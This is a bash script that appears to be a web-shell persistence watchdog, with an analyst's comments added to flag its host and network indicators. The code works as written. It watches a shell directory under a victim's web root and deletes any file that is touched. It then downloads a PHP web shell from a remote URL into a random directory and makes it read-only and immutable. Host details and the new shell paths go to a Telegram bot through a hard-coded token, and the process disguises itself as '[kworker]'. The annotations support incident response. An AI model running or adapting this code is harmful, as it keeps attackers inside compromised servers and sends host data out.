#!/bin/bash
# ANALYST NOTE: this listing is a web-shell persistence watchdog, annotated here
# for triage. What the visible code does:
#   - redirects all of its output, including the `set -x` trace, to one file
#     under /tmp;
#   - watches a "shell" directory under the web root with inotifywait;
#   - on modify/move/delete/attrib events it removes the touched file, fetches a
#     PHP file from a remote URL into a randomly chosen sibling directory, and
#     reports the new path to a Telegram chat;
#   - starts the watcher with argv[0] set to "[kworker]".
# Host artifacts to look for: the log file below, read-only (0400) and possibly
# immutable eight-character *.php files directly under the web root's
# subdirectories, a bash process named "[kworker]", and an inotifywait process
# watching the web root.
# Network artifacts: HTTPS POSTs to api.telegram.org and GETs to the
# BACKUP_SHELL host.

# Logging
# Everything the script prints, and the xtrace of every command (which expands
# the variables below, token included), ends up in this file.
LOG_FILE="/tmp/anti_gedor.log"
exec > "$LOG_FILE" 2>&1
set -x

# Configuration
# These hard-coded values are the page's indicators: victim web root, download
# URL for the PHP payload, and the Telegram bot token / chat id that receive the
# notifications.
WEB_ROOT="/home/sekolahb/public_html/"
WEB_SHELL_DIR="$WEB_ROOT/shell"
BACKUP_SHELL="https://raw.zeverix.com/raw/untitled-719"
TELEGRAM_BOT_TOKEN="7942393115:AAEriWlHhR0Y32kCHBZuYWj0ZcUvoW36MB0"
TELEGRAM_CHAT_ID="1345261884"

# Send a notification to Telegram, with error handling.
# Arguments: $1 - message text
# Outputs:   progress and error lines on stdout (redirected to LOG_FILE)
# Returns:   1 when the saved status is non-zero or the reply contains
#            "ok":false, otherwise 0
# Network:   one POST to the Bot API sendMessage endpoint, capped by timeout 10.
send_telegram() {
    local message="$1"
    echo "Mengirim pesan: $message"
    local response=$(timeout 10 curl -s -X POST "https://api.telegram.org/bot$TELEGRAM_BOT_TOKEN/sendMessage" \
        -d "chat_id=$TELEGRAM_CHAT_ID" \
        -d "text=$message" 2>&1)
    local curl_exit=$?
    if [ $curl_exit -ne 0 ]; then
        echo "ERROR: Curl gagal dengan kode $curl_exit"
        echo "Response: $response"
        return 1
    fi
    # Check the response from Telegram
    if echo "$response" | grep -q '"ok":false'; then
        echo "ERROR: Telegram API error"
        echo "Response: $response"
        return 1
    fi
    echo "Pesan terkirim successfully"
    return 0
}

# Startup notification.
# Collects the first address from `hostname -I`, the hostname, and the owner and
# group of WEB_ROOT from `ls -ld`, then sends them with the configured paths.
# For responders: this message discloses host identity to the Telegram chat.
send_startup_notification() {
    local server_ip=$(hostname -I | awk '{print $1}')
    local server_name=$(hostname)
    local web_root_info=$(ls -ld "$WEB_ROOT" | awk '{print $3,$4}')
    send_telegram "🟢 ANTI GEDOR BOT AKTIF! Server: $server_name ($server_ip) Web Root: $WEB_ROOT Shell Dir: $WEB_SHELL_DIR Owner: $web_root_info Status: Monitoring aktif ✅ Sistem siap menghadapi serangan! Siapa berani hapus, langsung hilang duluan!🖕"
}

# Re-deploy the PHP file.
# Picks a shuffled first-level directory under WEB_ROOT (skipping the root
# itself, cgi-bin, error, icons and shell), falls back to WEB_ROOT when none is
# found, and downloads BACKUP_SHELL there under an eight-character alphanumeric
# name ending in .php.
# Outputs: the new path on stdout, and a Telegram message carrying that path.
# Returns: 1 when curl reports a failure.
# Hunting hints grounded in the lines below: mode 0400 *.php files, and the
# immutable attribute (visible with lsattr) when the script ran as root.
deploy_shell() {
    echo "Deploying new shell..."
    local existing_dirs=($(find "$WEB_ROOT" -maxdepth 1 -type d ! -name "$(basename "$WEB_ROOT")" ! -name "cgi-bin" ! -name "error" ! -name "icons" ! -name "shell" 2>/dev/null | shuf))
    local random_dir="${existing_dirs[0]}"
    if [ -z "$random_dir" ]; then
        echo "Tidak ada direktori yang cocok, menggunakan WEB_ROOT"
        random_dir="$WEB_ROOT"
    fi
    local shell_name=$(tr -dc 'a-zA-Z0-9' < /dev/urandom | fold -w 8 | head -n 1).php
    local new_shell_path="$random_dir/$shell_name"
    echo "Mendownload shell ke: $new_shell_path"
    curl -s -o "$new_shell_path" "$BACKUP_SHELL"
    if [ $? -ne 0 ]; then
        echo "ERROR: Gagal download shell"
        return 1
    fi
    # Read-only for the owner; the immutable flag is attempted only as uid 0.
    chmod 400 "$new_shell_path"
    if [ "$(id -u)" -eq 0 ]; then
        chattr +i "$new_shell_path" 2>/dev/null
    fi
    send_telegram "⚠️ SHELL DEPLOYED: $new_shell_path"
    echo "$new_shell_path"
}

# Delete a file the script treats as hostile.
# Arguments: $1 - path to remove
# Returns:   1 when the path is not a regular file.
# Forensics: removal is `rm -f`; `shred -fuz` is used only when the file still
# exists afterwards, so overwritten content is the exception, not the rule.
delete_intruder() {
    local target="$1"
    echo "Menghapus file: $target"
    if [ ! -f "$target" ]; then
        echo "File tidak ditemukan: $target"
        return 1
    fi
    rm -f "$target"
    if [ -f "$target" ]; then
        shred -fuz "$target" 2>/dev/null
    fi
    echo "File berhasil dihapus"
}

# Look for a PHP process that appears to be deleting files and remove a file
# tied to it.
# Inspects up to ten PIDs whose command line matches "php". A process is flagged
# when its command line contains "unlink", "delete" or "rm ", or when its
# executable path contains WEB_SHELL_DIR.
# Impact note for responders: the path handed to delete_intruder is read from
# /proc/<pid>/exe, that is, the executable of the matching process, so a missing
# PHP interpreter binary on the host can be a side effect of this function.
# Outputs: the deleted path on stdout, and a Telegram message carrying it.
detect_and_delete_php_attacker() {
    echo "Mendeteksi PHP attacker..."
    local php_processes=$(pgrep -f "php" | head -10)
    local attacker_found=""
    for pid in $php_processes; do
        local php_file=$(readlink -f /proc/$pid/exe 2>/dev/null)
        local cmd=$(cat /proc/$pid/cmdline 2>/dev/null | tr '\0' ' ')
        if [[ "$cmd" == *"unlink"* ]] || [[ "$cmd" == *"delete"* ]] || [[ "$cmd" == *"rm "* ]]; then
            attacker_found="$php_file"
            break
        fi
        if [[ "$php_file" == *"$WEB_SHELL_DIR"* ]]; then
            attacker_found="$php_file"
            break
        fi
    done
    if [ -n "$attacker_found" ] && [ -f "$attacker_found" ]; then
        delete_intruder "$attacker_found"
        send_telegram "🔥 PHP ATTACKER DELETED! File: $attacker_found"
        echo "$attacker_found"
    fi
}

# Main script
echo "Memulai script..."
echo "WEB_ROOT: $WEB_ROOT"
echo "WEB_SHELL_DIR: $WEB_SHELL_DIR"

# Create the target directory
mkdir -p "$WEB_SHELL_DIR"
echo "Direktori target: $WEB_SHELL_DIR"

# Send the startup notification
send_startup_notification

# Main loop with process-name disguise.
# Detection: `exec -a` sets argv[0] to "[kworker]", but the process is still a
# backgrounded bash. Genuine kernel worker threads have an empty
# /proc/<pid>/cmdline and no resolvable /proc/<pid>/exe, so a "[kworker]" entry
# whose exe resolves to a shell stands out. The inotifywait child keeps its own
# name and arguments.
# The quoted program below is passed to bash -c as one string; the comments
# inside it are part of that string and are left as the author wrote them.
exec -a "[kworker]" bash -c '
    echo "Memulai monitoring..."
    # Monitor direktori
    inotifywait -m -r -e modify,move,delete,attrib "$WEB_SHELL_DIR" --format "%w%f %e" 2>/dev/null | while read file event
    do
        echo "Terdeteksi: $file dengan event $event"
        [[ -d "$file" ]] && continue
        # Hapus file yang diotak-atik
        delete_intruder "$file"
        # Deteksi dan hapus balik PHP attacker
        attacker_file=$(detect_and_delete_php_attacker)
        # Deploy shell baru
        new_shell=$(deploy_shell)
        # Kirim notifikasi lengkap
        if [ -n "$attacker_file" ]; then
            send_telegram "🚨 PHP ATTACKER DETECTED & DELETED! File: $file Event: $event Attacker: $attacker_file New Shell: $new_shell ✅Mendeteksi file PHP yang dipakai untuk menghapus. ✅Menghapus balik file PHP tersebut secara otomatis. ✅Mengirim notifikasi ke bot Telegram Anda dengan detail ancamannya. Prinsipnya simpel: Siapa berani hapus, langsung hilang duluan!🖕"
        else
            send_telegram "🚨 ALERT! File: $file | Event: $event | New Shell: $new_shell"
        fi
    done
' &